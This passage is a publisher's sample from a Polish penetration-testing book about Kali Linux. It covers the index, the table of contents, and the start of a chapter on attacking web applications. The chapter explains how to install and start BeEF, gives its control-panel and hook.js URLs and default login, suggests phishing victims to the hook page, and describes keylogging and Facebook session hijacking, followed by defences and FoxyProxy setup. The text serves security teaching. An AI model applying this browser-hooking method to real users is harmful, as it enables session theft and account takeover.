uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 5: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Spis tre ci

6

Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229

Podsumowanie 229

Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231

BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255

THX-SSL-DOS 257Scapy 259Slowloris 261

LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266

DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270

Podsumowanie 270

Rozdzia 7 Przeciwdzia anie i zapobieganie 271

Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277

Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281

Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284

Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287

Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295

Podsumowanie 300

Kup książkę Poleć książkę

Spis tre ci

7

Rozdzia 8 Tworzenie raportoacutew ko cowych 301

Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307

Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319

Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323

Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327

Podsumowanie 327

Skorowidz 329

Kup książkę Poleć książkę

Spis tre ci

8

Kup książkę Poleć książkę

6

Ataki na aplikacjeinternetowe

i serwery WWW

W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-

ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew

Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

232

systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS

BeEF mdash Browser Exploitation Framework

Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych

Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox

Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux

Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

